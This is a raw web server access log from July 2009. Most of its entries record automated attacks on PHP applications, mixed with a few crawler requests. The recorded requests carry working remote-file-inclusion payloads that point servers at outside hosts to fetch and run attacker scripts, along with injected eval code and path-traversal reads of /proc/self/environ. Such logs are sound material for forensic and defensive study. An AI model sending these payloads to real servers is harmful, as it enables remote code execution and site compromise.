85.17.162.28 - - [02/Jul/2009:16:52:22 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 335
208.38.187.136 - - [02/Jul/2009:16:56:22 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 321
208.38.187.136 - - [02/Jul/2009:16:56:22 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 337
208.38.187.136 - - [02/Jul/2009:16:56:22 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 326
208.38.187.136 - - [02/Jul/2009:16:56:28 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 321
208.38.187.136 - - [02/Jul/2009:16:56:28 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 337
208.38.187.136 - - [02/Jul/2009:16:56:28 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 326
222.122.27.67 - - [02/Jul/2009:16:56:40 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 321
222.122.27.67 - - [02/Jul/2009:16:56:40 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 337
222.122.27.67 - - [02/Jul/2009:16:56:40 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 326
202.181.243.113 - - [02/Jul/2009:16:56:43 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 321
202.181.243.113 - - [02/Jul/2009:16:56:43 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 326
202.181.243.113 - - [02/Jul/2009:16:56:43 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 337
222.122.27.67 - - [02/Jul/2009:16:57:05 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 321
222.122.27.67 - - [02/Jul/2009:16:57:05 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 326
222.122.27.67 - - [02/Jul/2009:16:57:10 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 337
208.38.187.136 - - [02/Jul/2009:16:57:47 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 339
208.38.187.136 - - [02/Jul/2009:16:57:50 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 339
202.181.243.113 - - [02/Jul/2009:16:59:40 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 339
74.125.75.17 - - [02/Jul/2009:17:15:06 +0000] "GET /favicon.ico HTTP/1.1" 404 288
74.125.75.17 - - [02/Jul/2009:17:15:06 +0000] "GET / HTTP/1.1" 200 125
88.191.37.60 - - [02/Jul/2009:17:19:03 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 317
88.191.37.60 - - [02/Jul/2009:17:19:03 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 322
88.191.37.60 - - [02/Jul/2009:17:19:03 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 335
222.122.27.67 - - [02/Jul/2009:17:27:11 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 322
222.122.27.67 - - [02/Jul/2009:17:27:11 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 317
222.122.27.67 - - [02/Jul/2009:17:27:11 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 335
222.122.27.67 - - [02/Jul/2009:17:27:59 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 333
88.191.37.60 - - [02/Jul/2009:17:28:26 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 333
72.14.199.85 - - [02/Jul/2009:17:28:27 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
222.122.27.67 - - [02/Jul/2009:17:28:47 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 322
222.122.27.67 - - [02/Jul/2009:17:28:47 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 317
222.122.27.67 - - [02/Jul/2009:17:28:47 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 335
202.181.243.113 - - [02/Jul/2009:17:29:54 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 317
202.181.243.113 - - [02/Jul/2009:17:29:54 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 322
202.181.243.113 - - [02/Jul/2009:17:29:54 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 335
222.122.27.67 - - [02/Jul/2009:17:30:37 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 333
212.175.12.133 - - [02/Jul/2009:17:33:54 +0000] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 319
212.175.12.133 - - [02/Jul/2009:17:33:54 +0000] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 324
212.175.12.133 - - [02/Jul/2009:17:33:54 +0000] "GET /logs/access_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 335
202.181.243.113 - - [02/Jul/2009:17:36:25 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 333
121.165.73.157 - - [02/Jul/2009:17:51:41 +0000] "GET /logs/show_image_in_imgtag.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 306
210.205.57.2 - - [02/Jul/2009:18:00:57 +0000] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/pid.txt? HTTP/1.1" 200 125
206.196.125.113 - - [02/Jul/2009:18:21:59 +0000] "GET /atom.xml HTTP/1.1" 200 4103
91.121.89.135 - - [02/Jul/2009:18:28:32 +0000] "GET /logs/access_log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 344
91.121.89.135 - - [02/Jul/2009:18:28:32 +0000] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 333
91.121.89.135 - - [02/Jul/2009:18:28:32 +0000] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 328
72.14.199.85 - - [02/Jul/2009:18:28:35 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
60.43.229.5 - - [02/Jul/2009:18:56:39 +0000] "GET /logs/access_log%20%20//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 311
60.43.229.5 - - [02/Jul/2009:18:56:39 +0000] "GET //mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 293
60.43.229.5 - - [02/Jul/2009:18:56:39 +0000] "GET /logs//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 298
121.165.73.157 - - [02/Jul/2009:19:00:22 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 328
121.165.73.157 - - [02/Jul/2009:19:00:22 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 333
121.165.73.157 - - [02/Jul/2009:19:00:22 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 346
203.151.217.29 - - [02/Jul/2009:19:03:52 +0000] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 200 125
203.151.217.29 - - [02/Jul/2009:19:03:52 +0000] "GET /logs/access_log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 296
203.151.217.29 - - [02/Jul/2009:19:03:52 +0000] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 200 1884
121.165.73.157 - - [02/Jul/2009:19:10:19 +0000] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 311
121.165.73.157 - - [02/Jul/2009:19:10:19 +0000] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 300
121.165.73.157 - - [02/Jul/2009:19:10:19 +0000] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 295
203.151.217.29 - - [02/Jul/2009:19:11:58 +0000] "GET /logs/access_log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 294
121.165.73.157 - - [02/Jul/2009:19:12:43 +0000] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 300
121.165.73.157 - - [02/Jul/2009:19:12:46 +0000] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 295
121.165.73.157 - - [02/Jul/2009:19:12:46 +0000] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 311
118.129.167.26 - - [02/Jul/2009:19:20:07 +0000] "GET //kboard.php?board=free&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 288
118.129.167.26 - - [02/Jul/2009:19:20:07 +0000] "GET /logs/access_log%20%20//kboard.php?board=free&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 306
118.129.167.26 - - [02/Jul/2009:19:20:07 +0000] "GET /logs//kboard.php?board=free&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 293
74.6.8.98 - - [02/Jul/2009:19:21:23 +0000] "GET /logs/?S=D HTTP/1.0" 200 1867
87.106.249.217 - - [02/Jul/2009:19:23:47 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 321
87.106.249.217 - - [02/Jul/2009:19:23:47 +0000] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 303
87.106.249.217 - - [02/Jul/2009:19:23:47 +0000] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308
72.14.199.85 - - [02/Jul/2009:19:28:41 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
87.106.249.217 - - [02/Jul/2009:19:29:30 +0000] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 319
123.143.98.5 - - [02/Jul/2009:19:33:33 +0000] "GET //contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 332
123.143.98.5 - - [02/Jul/2009:19:33:34 +0000] "GET /logs/access_log//contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 348
123.143.98.5 - - [02/Jul/2009:19:33:34 +0000] "GET /logs//contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 337
123.143.98.5 - - [02/Jul/2009:19:35:16 +0000] "GET //contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 332
123.143.98.5 - - [02/Jul/2009:19:35:16 +0000] "GET /logs/access_log//contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 348
123.143.98.5 - - [02/Jul/2009:19:35:16 +0000] "GET /logs//contenido/includes/includes.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.usher.co.kr//flvPlay/id.txt?? HTTP/1.1" 404 337
193.47.80.48 - - [02/Jul/2009:20:09:14 +0000] "GET /robots.txt HTTP/1.1" 404 287
193.47.80.48 - - [02/Jul/2009:20:09:14 +0000] "GET / HTTP/1.1" 200 125
79.49.190.214 - - [02/Jul/2009:20:09:29 +0000] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 303
79.49.190.214 - - [02/Jul/2009:20:09:33 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 321
79.49.190.214 - - [02/Jul/2009:20:09:33 +0000] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 308
72.14.199.85 - - [02/Jul/2009:20:28:57 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
79.49.190.214 - - [02/Jul/2009:20:30:34 +0000] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 319
60.43.229.5 - - [02/Jul/2009:20:32:28 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET%5Bw%5D);class%20zZz_ADOConnection%7B%7D//&w=include($_GET%5Ba%5D);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 310
60.43.229.5 - - [02/Jul/2009:20:32:29 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET%5Bw%5D);class%20zZz_ADOConnection%7B%7D//&w=include($_GET%5Ba%5D);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 305
60.43.229.5 - - [02/Jul/2009:20:32:29 +0000] "GET /logs/access_log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET%5Bw%5D);class%20zZz_ADOConnection%7B%7D//&w=include($_GET%5Ba%5D);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 323
60.43.229.5 - - [02/Jul/2009:20:43:55 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET%5Bw%5D);class%20zZz_ADOConnection%7B%7D//&w=include($_GET%5Ba%5D);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 321
61.100.5.136 - - [02/Jul/2009:20:58:43 +0000] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 344
61.100.5.136 - - [02/Jul/2009:20:58:43 +0000] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 349
61.100.5.136 - - [02/Jul/2009:20:58:43 +0000] "GET /logs/access_log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 360
69.72.208.90 - - [02/Jul/2009:21:06:24 +0000] "GET ///vwar/backup/errors.php?error=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 301
69.72.208.90 - - [02/Jul/2009:21:06:24 +0000] "GET /logs///vwar/backup/errors.php?error=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 306
69.72.208.90 - - [02/Jul/2009:21:06:24 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 317
61.100.5.136 - - [02/Jul/2009:21:08:58 +0000] "GET /logs/access_log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 362
72.14.199.85 - - [02/Jul/2009:21:29:09 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET //appserv/main.php?appserv_root=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 294
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET /logs/access_log//appserv/main.php?appserv_root=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 310
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET /logs//appserv/main.php?appserv_root=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 299
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 287
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET /logs/access_log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 303
222.231.3.136 - - [02/Jul/2009:21:37:48 +0000] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 292
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET /logs/access_log//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 310
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET //appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 294
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET /logs/access_log//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299
222.231.3.136 - - [02/Jul/2009:21:37:49 +0000] "GET //appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs/access_log//claroline/phpbb/page_tail.php?includePath=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 323
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET //claroline/phpbb/page_tail.php?includePath=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 307
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 312
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs/access_log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 303
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 287
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 292
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs/access_log//claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 323
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET //claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 307
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs//claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 312
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs/access_log//claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET //claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307
91.195.124.16 - - [02/Jul/2009:21:50:35 +0000] "GET /logs//claroline/phpbb/page_tail.php?includePath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312
72.14.199.85 - - [02/Jul/2009:22:29:12 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
61.100.5.136 - - [02/Jul/2009:22:56:33 +0000] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 314
61.100.5.136 - - [02/Jul/2009:22:56:33 +0000] "GET /logs/access_log%20%20//snippets/reflect/snippet.reflect.php?reflect_base=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 332
61.100.5.136 - - [02/Jul/2009:22:56:35 +0000] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 319
81.169.149.193 - - [02/Jul/2009:23:09:27 +0000] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 319
81.169.149.193 - - [02/Jul/2009:23:09:27 +0000] "GET /logs/access_log//snippets/reflect/snippet.reflect.php?reflect_base=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 330
